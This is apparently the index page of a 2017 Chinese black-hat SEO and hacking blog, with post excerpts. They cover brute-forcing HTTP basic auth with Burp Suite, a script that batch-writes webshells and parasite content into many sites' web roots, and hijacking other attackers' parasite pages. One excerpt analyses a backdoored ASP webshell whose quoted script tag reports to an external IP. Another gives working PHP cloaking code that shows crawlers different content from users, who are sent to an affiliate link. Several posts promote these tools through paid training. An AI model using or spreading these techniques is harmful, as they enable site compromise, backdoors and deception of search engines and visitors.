burpsuite基础认证爆破

2017年11月29日  No comment

很多小伙伴不知道怎么使用burpsuite对基础认证进行报错,这次工作中遇到了,刚好写篇文章记录一下,更是为了分享给不知道的小伙伴。基础认证有的人可能不知道基础认证是啥,但我相信你一定在实战中遇到过,比如tomcat的manager平台的登录验证:基础认证的数据包跟往常的POST和GET的包认证方式不一样,他的请求包是像下面这样的格式:GET /manager/html HTTP/1.1 Host: www.xxx.com Connection: keep


阅读全文 »

网络安全中机器学习大合集

2017年09月22日  No comment

↑ 数据集安全相关数据样本集DARPA 入侵检测数据集Stratosphere IPS 数据集开放数据集NSA 的数据捕获ADFA 入侵检测数据集NSL-KDD 数据集恶意 URL 数据集多源安全事件数据集恶意软件训练集KDD Cup 1999 数据集Web 攻击载荷WAF 恶意请求数据集恶意软件训练数据集Aktaion 数据集DeepEnd 研究中的犯罪数据集公开可用的 PCAP 文件数据集↑ 论文快速、可靠、准确:使用神经网络建模猜测密码封闭世界之外,应用机器学习在网络入
阅读全文 »

脚本自动采集整站文章标题+内容

2017年06月16日  1 Comment

因为做链轮需要大量新鲜的文章内容和标题等。于是写了个PHP的自动采集,可以采集整站的文章内容效果图如下:可以直接采集整站的文章内容到我们本地。速度和效率上很快。报名参加脚本开发特训的学员可以免费拿到项目期开发的所有的程序脚本!一起来做个唯技术的人吧!
阅读全文 »

站群批量挂马脚本

2017年06月15日  No comment

功能:        一:读取站群内所有网站根目录规则。        二:批量在网站根目录写入指定文件和内容。        三:可寄生一句话或者任意内容。效果图如下:报名参加脚本开发特训的学员可以免费拿到项目期开发的所有的程序脚本!一起来做个唯技术的人吧!
阅读全文 »

黑吃黑:PHP全局劫持别人寄生虫!

2017年06月05日  1 Comment

因为平常做寄生虫的时候,经常发现shell已经被同行做了寄生虫,很烦人。于是觉得,既然别人已经做上排名了,也已经用了shell,那么我们为何不写一个黑吃黑,劫持别人的脚本呢?功能:        1.全局劫持掉别人寄生的页面!(别人寄生多少个!我们劫持多少个!)        2.劫持后并锁定文件!系统内核权限!禁止编辑和修改! 
阅读全文 »

镜像程序实现+原理

2017年05月26日  No comment

昨晚朋友发来个地址,打开一看是一个做镜像程序。看了下演示,发现原理其实很简单,或者说就是在线代理的原理。上午抽时间还原了下这个原理,现在代码分享出来,供有需要的朋友获取。 1、地址归一为了获得更好的效果,所以地址我们完全仿照源站地址,这样就需要使用各种技术来接收这个地址,因为我们这里仅讨论原理,所以就使用伪静态吧,以下是apache的伪静态规则<IfModule mod_rewrite.c> RewriteEngine on RewriteCond&
阅读全文 »

黑吃黑:分析一款asp webshell后门箱子

2017年05月21日  No comment

在群内看到有人分享免杀木马。第一眼感觉哪有这种好事,于是下载下来开始分析。用编辑器打开开始读代码。我们可以看到第三行代码如下:代码为:UserPass="admin123"  '密码一般后门分好多种,直接跟随UserPass变量,直接爆菊。代码内容为:j"<script src=""http://121.50.168.146:8080/api.asp?url="&server.URLE
阅读全文 »

在脚本中ASCII码的玩法

2017年05月15日  No comment

ASCII(American Standard Code for Information Interchange,美国信息互换标准代码)是基于拉丁字母的一套电脑编码系统,主要用于显示现代美式英语,并等同于国际标准ISO/IEC 646。标准ASCII编码可表示128个字符,包括大小写拉丁字母,阿拉伯数字、英语标点符号,以及在美式英语中使用的特殊控制字符。另有扩展版本的ASCII编码添加了一些西欧字符,可以表示255个字符,但是西欧国家间对扩充的字符定义不一致,并不是通用版本。用PHP中chr函数
阅读全文 »

PHP Chr函数

2017年05月15日  No comment

PHP chr() 函数从指定的 ASCII 值返回字符。


阅读全文 »

蜘蛛劫持作淘客跳转小例子

2017年05月14日  No comment

核心代码如下:

header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false)
{
   echo '';
}
else
{
   echo "淘宝客地址";
}

阅读全文 »